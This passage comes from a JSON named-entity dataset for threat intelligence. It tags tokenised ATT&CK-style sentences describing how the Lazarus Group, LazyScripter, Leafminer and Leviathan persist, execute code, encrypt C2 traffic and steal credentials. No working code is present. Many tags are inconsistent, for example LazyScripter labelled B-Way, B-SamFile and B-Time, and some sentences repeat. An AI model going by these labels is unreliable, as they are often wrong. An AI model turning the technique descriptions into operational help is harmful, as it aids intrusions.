"commands", - "and", - "malicious", - "code." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "Lazarus", - "Group", - "malware", - "families", - "gather", - "a", - "list", - "of", - "running", - "processes", - "on", - "a", - "victim", - "system", - "and", - "send", - "it", - "to", - "their", - "C2", - "server.", - "A", - "Destover-like", - "variant", - "used", - "by", - "Lazarus", - "Group", - "also", - "gathers", - "process", - "times." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "also", - "uses", - "a", - "unique", - "form", - "of", - "communication", - "encryption", - "known", - "as", - "FakeTLS", - "that", - "mimics", - "TLS", - "but", - "uses", - "a", - "different", - "encryption", - "method,", - "potentially", - "evading", - "SSL", - "traffic", - "inspection/decryption." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "IndiaIndia", - "checks", - "Registry", - "keys", - "within", - "HKCU", - "and", - "HKLM", - "to", - "determine", - "if", - "certain", - "applications", - "are", - "present,", - "including", - "SecureCRT,", - "Terminal", - "Services,", - "RealVNC,", - "TightVNC,", - "UltraVNC,", - "Radmin,", - "mRemote,", - "TeamViewer,", - "FileZilla,", - "pcAnyware,", - "and", - "Remote", - "Desktop.", - "Another", - "Lazarus", - "Group", - "malware", - "sample", - "checks", - "for", - "the", - "presence", - "of", - "the", - "following", - "Registry", - "key:<code>HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "changed", - "memory", - "protection", - "permissions", - "then", - "overwritten", - "in", - "memory", - "DLL", - "function", - "code", - "with", - "shellcode,", - "which", - "was", - "later", - "executed", - "via", - "KernelCallbackTable", - "hijacking.", - "Lazarus", - "Group", - "has", - "also", - "used", - "shellcode", - "within", - "macros", - "to", - "decrypt", - "and", - "manually", - "map", - "DLLs", - "into", - "memory", - "at", - "runtime." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "maintained", - "persistence", - "by", - "loading", - "malicious", - "code", - "into", - "a", - "startup", - "folder", - "or", - "by", - "adding", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "SierraCharlie", - "uses", - "RDP", - "for", - "propagation." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "renamed", - "system", - "utilities", - "such", - "as", - "<code>wscript.exe</code>", - "and", - "<code>mshta.exe</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "rundll32", - "to", - "execute", - "malicious", - "payloads", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "SierraAlfa", - "accesses", - "the", - "<code>ADMIN$</code>", - "share", - "via", - "SMB", - "to", - "conduct", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "used", - "SSH", - "and", - "the", - "PuTTy", - "PSCP", - "utility", - "to", - "gain", - "access", - "to", - "a", - "restricted", - "segment", - "of", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "<code>schtasks</code>", - "for", - "persistence", - "including", - "through", - "the", - "periodic", - "execution", - "of", - "a", - "remote", - "XSL", - "script", - "or", - "a", - "dropped", - "VBS", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "compromised", - "servers", - "to", - "stage", - "malicious", - "tools." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "stopped", - "the", - "MSExchangeIS", - "service", - "to", - "render", - "Exchange", - "contents", - "inaccessible", - "to", - "users." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "has", - "maintained", - "persistence", - "on", - "a", - "system", - "by", - "creating", - "a", - "LNK", - "shortcut", - "in", - "the", - "user’s", - "Startup", - "folder." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "created", - "new", - "Twitter", - "accounts", - "to", - "conduct", - "social", - "engineering", - "against", - "potential", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "targeted", - "victims", - "with", - "spearphishing", - "emails", - "containing", - "malicious", - "Microsoft", - "Word", - "documents." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "sent", - "malicious", - "links", - "to", - "victims", - "via", - "email." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "social", - "media", - "platforms,", - "including", - "LinkedIn", - "and", - "Twitter,", - "to", - "send", - "spearphishing", - "messages." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "A", - "Lazarus", - "Group", - "malware", - "sample", - "encodes", - "data", - "with", - "base64." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "Lazarus", - "Group", - "malware", - "families", - "encrypt", - "C2", - "traffic", - "using", - "custom", - "code", - "that", - "uses", - "XOR", - "with", - "an", - "ADD", - "operation", - "and", - "XOR", - "with", - "a", - "SUB", - "operation.", - "Another", - "Lazarus", - "Group", - "malware", - "sample", - "XORs", - "C2", - "traffic.", - "Other", - "Lazarus", - "Group", - "malware", - "uses", - "Caracachs", - "encryption", - "to", - "encrypt", - "C2", - "payloads.", - "Lazarus", - "Group", - "has", - "also", - "used", - "AES", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "lnk", - "files", - "used", - "for", - "persistence", - "have", - "abused", - "the", - "Windows", - "Update", - "Client", - "(<code>wuauclt.exe</code>)", - "to", - "execute", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "Several", - "Lazarus", - "Group", - "malware", - "families", - "collect", - "information", - "on", - "the", - "type", - "and", - "version", - "of", - "the", - "victim", - "OS,", - "as", - "well", - "as", - "the", - "victim", - "computer", - "name", - "and", - "CPU", - "information.", - "A", - "Destover-like", - "variant", - "used", - "by", - "Lazarus", - "Group", - "also", - "collects", - "disk", - "space", - "information", - "and", - "sends", - "it", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Purp", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "IndiaIndia", - "obtains", - "and", - "sends", - "to", - "its", - "C2", - "server", - "information", - "about", - "the", - "first", - "network", - "interface", - "card’s", - "configuration,", - "including", - "IP", - "address,", - "gateways,", - "subnet", - "mask,", - "DHCP", - "information,", - "and", - "whether", - "WINS", - "is", - "available." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "<code>net", - "use</code>", - "to", - "identify", - "and", - "establish", - "a", - "network", - "connection", - "with", - "a", - "remote", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Various", - "Lazarus", - "Group", - "malware", - "enumerates", - "logged-on", - "users." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "rebooted", - "systems", - "after", - "destroying", - "files", - "and", - "wiping", - "the", - "MBR", - "on", - "infected", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Destover-like", - "implant", - "used", - "by", - "Lazarus", - "Group", - "can", - "obtain", - "the", - "current", - "system", - "time", - "and", - "send", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "Lazarus", - "Group", - "malware", - "families", - "use", - "timestomping,", - "including", - "modifying", - "the", - "last", - "write", - "timestamp", - "of", - "a", - "specified", - "Registry", - "key", - "to", - "a", - "random", - "date,", - "as", - "well", - "as", - "copying", - "the", - "timestamp", - "for", - "legitimate", - ".exe", - "files", - "(such", - "as", - "calc.exe", - "or", - "mspaint.exe)", - "to", - "its", - "dropped", - "files." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "obtained", - "a", - "variety", - "of", - "tools", - "for", - "their", - "operations,", - "including", - "Responder", - "and", - "PuTTy", - "PSCP." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "administrator", - "credentials", - "to", - "gain", - "access", - "to", - "restricted", - "network", - "segments." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "VBA", - "and", - "embedded", - "macros", - "in", - "Word", - "documents", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "conducted", - "C2", - "over", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "hosted", - "malicious", - "downloads", - "on", - "Github." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "host.", - "A", - "Destover-like", - "variant", - "used", - "by", - "Lazarus", - "Group", - "uses", - "a", - "batch", - "file", - "mechanism", - "to", - "delete", - "its", - "binaries", - "from", - "the", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "WMIC", - "for", - "discovery", - "as", - "well", - "as", - "to", - "execute", - "payloads", - "for", - "persistence", - "and", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "Lazarus", - "Group", - "malware", - "families", - "install", - "themselves", - "as", - "new", - "services." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "leveraged", - "the", - "BatchEncryption", - "tool", - "to", - "perform", - "advanced", - "batch", - "script", - "obfuscation", - "and", - "encoding", - "techniques." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "leveraged", - "dynamic", - "DNS", - "providers", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Org", - "B-Purp", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "dynamic", - "DNS", - "providers", - "to", - "create", - "legitimate-looking", - "subdomains", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Org", - "B-Purp", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "had", - "downloaded", - "additional", - "tools", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "JavaScript", - "in", - "its", - "attacks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "lured", - "users", - "to", - "open", - "malicious", - "email", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "links", - "to", - "malicious", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "a", - "variety", - "of", - "open-source", - "remote", - "access", - "Trojans", - "for", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "several", - "different", - "security", - "software", - "icons", - "to", - "disguise", - "executables." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "`mshta.exe`", - "to", - "execute", - "Koadic", - "stagers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "PowerShell", - "scripts", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "achieved", - "persistence", - "via", - "writing", - "a", - "PowerShell", - "script", - "to", - "the", - "autorun", - "registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "`rundll32.exe`", - "to", - "execute", - "Koadic", - "stagers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "spam", - "emails", - "weaponized", - "with", - "archive", - "or", - "document", - "files", - "as", - "its", - "initial", - "infection", - "vector." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "spam", - "emails", - "that", - "contain", - "a", - "link", - "that", - "redirects", - "the", - "victim", - "to", - "download", - "a", - "malicious", - "document." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "hosted", - "open-source", - "remote", - "access", - "Trojans", - "used", - "in", - "its", - "operations", - "in", - "GitHub." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "VBScript", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "GitHub", - "to", - "host", - "its", - "payloads", - "to", - "operate", - "spam", - "campaigns." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "established", - "GitHub", - "accounts", - "to", - "host", - "its", - "toolsets." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LazyScripter", - "has", - "used", - "batch", - "files", - "to", - "deploy", - "open-source", - "and", - "multi-stage", - "RATs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "several", - "tools", - "for", - "retrieving", - "login", - "and", - "password", - "information,", - "including", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "obfuscated", - "scripts", - "that", - "were", - "used", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "several", - "tools", - "for", - "retrieving", - "login", - "and", - "password", - "information,", - "including", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "several", - "tools", - "for", - "retrieving", - "login", - "and", - "password", - "information,", - "including", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "several", - "tools", - "for", - "retrieving", - "login", - "and", - "password", - "information,", - "including", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "has", - "infected", - "victims", - "using", - "watering", - "holes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "a", - "tool", - "called", - "MailSniper", - "to", - "search", - "for", - "files", - "on", - "the", - "desktop", - "and", - "another", - "utility", - "called", - "Sobolsoft", - "to", - "extract", - "attachments", - "from", - "EML", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "infected", - "victims", - "using", - "JavaScript", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "several", - "tools", - "for", - "retrieving", - "login", - "and", - "password", - "information,", - "including", - "LaZagne." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "several", - "tools", - "for", - "retrieving", - "login", - "and", - "password", - "information,", - "including", - "LaZagne", - "and", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "a", - "tool", - "called", - "Imecab", - "to", - "set", - "up", - "a", - "persistent", - "remote", - "access", - "account", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "scanned", - "network", - "services", - "to", - "search", - "for", - "vulnerabilities", - "in", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "a", - "tool", - "called", - "Total", - "SMB", - "BruteForcer", - "to", - "perform", - "internal", - "password", - "spraying." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "has", - "used", - "Process", - "Doppelgänging", - "to", - "evade", - "security", - "software", - "while", - "deploying", - "tools", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "a", - "tool", - "called", - "MailSniper", - "to", - "search", - "through", - "the", - "Exchange", - "server", - "mailboxes", - "for", - "keywords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leafminer", - "used", - "Microsoft’s", - "Sysinternals", - "tools", - "to", - "gather", - "detailed", - "information", - "about", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leafminer", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "LaZagne,", - "Mimikatz,", - "PsExec,", - "and", - "MailSniper." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "archived", - "victim's", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "BITSAdmin", - "to", - "download", - "additional", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "inserted", - "garbage", - "characters", - "into", - "code,", - "presumably", - "to", - "avoid", - "anti-virus", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "stolen", - "code", - "signing", - "certificates", - "to", - "sign", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-OffAct", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "collected", - "compromised", - "credentials", - "to", - "use", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leviathan", - "has", - "used", - "a", - "DLL", - "known", - "as", - "SeDll", - "to", - "decrypt", - "and", - "execute", - "other", - "JavaScript", - "backdoors." - ], - "ner_tags": 